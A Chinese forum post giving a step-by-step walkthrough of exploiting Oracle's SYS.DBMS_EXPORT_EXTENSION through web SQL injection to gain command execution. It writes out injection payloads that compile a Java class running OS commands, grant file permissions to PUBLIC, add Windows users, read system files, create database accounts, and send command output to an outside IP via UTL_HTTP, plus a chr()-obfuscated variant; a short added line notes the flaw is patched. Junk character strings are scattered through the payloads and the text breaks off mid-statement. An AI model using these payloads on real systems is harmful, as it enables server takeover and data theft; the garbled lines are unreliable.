
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在 web 上的 SQL Plus 执行的,在 web 注入时把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
+ S9 S' y% J9 c. P" u: P  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) * U7 w3 T8 X4 g% R& S- j
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用 POST 提交。
以下是各个步骤(说明:SYS.DBMS_EXPORT_EXTENSION 的这一注入点是早已被 Oracle 修补的旧漏洞,打过补丁的版本会拒绝执行这些语句;防御侧除及时安装 CPU 补丁外,还可考虑收回 PUBLIC 对该包的执行权限):
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 oracle 上创建 Java 包 LinxUtil,里面两个函数,runCMD 用于执行系统命令,readFile 用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||( 1 g7 v% p' S8 ^- A4 \
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% c. w% Z* n! X, d; z. o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
0 F! s9 Q* i' @( e% }$ i. znew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
/ t9 X8 V: |9 r0 d! G5 i}'''';END;'';END;--','SYS',0,'1',0) from dual
------------------------
如果 URL 有长度限制,可以把 readFile() 函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(   L2 H* l& C3 H2 {
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& l: C# Z$ r5 H1 {1 rcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
6 ~" W* \+ l! cnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
) ~* M& q& t1 [0 F* p$ |! U}'''';END;'';END;--','SYS',0,'1',0) from dual
" `+ a" j0 g6 Y+ H4 ^6 z)
同时把后面步骤中提到的对 readFile() 的处理语句去掉。
------------------------------
2.赋Java权限
9 n; O" w; S" v3 d+ s5 yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual+ m+ z$ z1 ~+ ]( J# j4 y
3.创建函数
6 I7 W8 a% N$ W" G. Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
/ Y* ~. g5 i" G( g& lcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
9 p: A0 U8 Z/ ~" T  K; ^* Y- _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ m( ]+ K1 C7 _: }) A# a8 J) f
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
5 p1 f. V7 j6 J4 F0 fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
1 P3 t7 Q8 K7 f& s. |" d5 ~( M" Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual: K3 `3 n0 N6 K- D
5.测试上面的几步是否成功
! B" z( ]6 h7 @and '1'<>'11'||(
0 s+ C2 _: e) }4 d' mselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 5 i( x  n1 a9 t
) ! J0 I9 {$ B# n9 i# {5 G4 }2 u, X/ S
and '1'<>( + H8 z4 R2 y, M% F- n+ }) A
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' ; F5 H+ p& S4 b7 o8 t
)
6.执行命令:
/xxx.jsp?id=1 and '1'<>( ) F5 g" s& C1 b& X4 p
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
) 3 B2 a% v- j- K* K9 j) e
/xxx.jsp?id=1 and '1'<>( 6 I9 q# g7 c5 U9 A  R/ d/ d4 G
select  sys.LinxReadFile('c:/boot.ini') from dual" y) ]# R' _8 u4 ?! n

# m' T) y/ x5 L)
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union:
4 e/ i$ [1 q/ Y7 G# o  k0 J/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual7 N: [0 ~/ M. }% I
或者 UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>( * O! Z  ^. M5 l6 w- F
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
8 o' V0 @7 F; I3 S1 w6 h! T) 7 N# l+ t6 D( o' Y, q+ f( i
/xxx.jsp?id=1 and '1'<>( 4 }/ y. {9 t, R) ^
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual& h5 [& S6 F- v6 g
)
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则会无法提交 http request。用 utl_encode.base64_encode 也可以。
--------------------
6.内部变化
通过以下命令可以查看 all_objects 表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'/ q* d6 K* R9 d# F
7.删除我们创建的函数
0 c. E+ F. e8 d# l+ Tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 Q' Z5 p6 c- [  C) J$ ]drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
8 q1 p! i6 m+ s) g$ ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- b' B7 F; j0 Y" w+ ?0 PCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
. D2 ^7 a  D" i8 ?% Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),9 l& s1 p; f. h) S3 Y& ?1 n
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 2 _2 j/ I7 e6 _  c  k6 G5 M/ |
确定漏洞存在:
% k0 q* l7 x7 ?1 y0 d1<>(
% W, ?0 ?) ?3 I1 y7 d, o9 [. d1 I2 fselect user_id from all_users where username='LINXSQL'
& Z8 z! K! N0 v9 |; t8 ?* |' n)
给 linxsql 连接权限:
4 m8 u  J, h. r* q& {) ]8 b) cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 n: J! O1 j0 G5 q, r* y. y- y7 T2 jGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 8 G. ^! l$ m6 l+ t5 _# O% ?  n
删除帐号:
& f) v9 q0 |( T% ]4 {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! E4 ~: G! s: m+ y- d
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 0 D5 }% }( [9 K  O
======================
以下方法创建一个可以执行多语句的函数 Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是 public 权限,作用似乎不大,真的要用的话可以考虑 grant dba to 当前的 User:
4 f$ ~0 R8 P& w6 @6 z$ x3 V1.jsp?id=1 and '1'<>( ) \/ B& W( x  O6 D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 h% K+ E) ?5 p3 ], Ycreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual$ _* X8 ?2 \; v1 P# o' B, L/ r
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
* K3 S% D; B0 E8 [& R )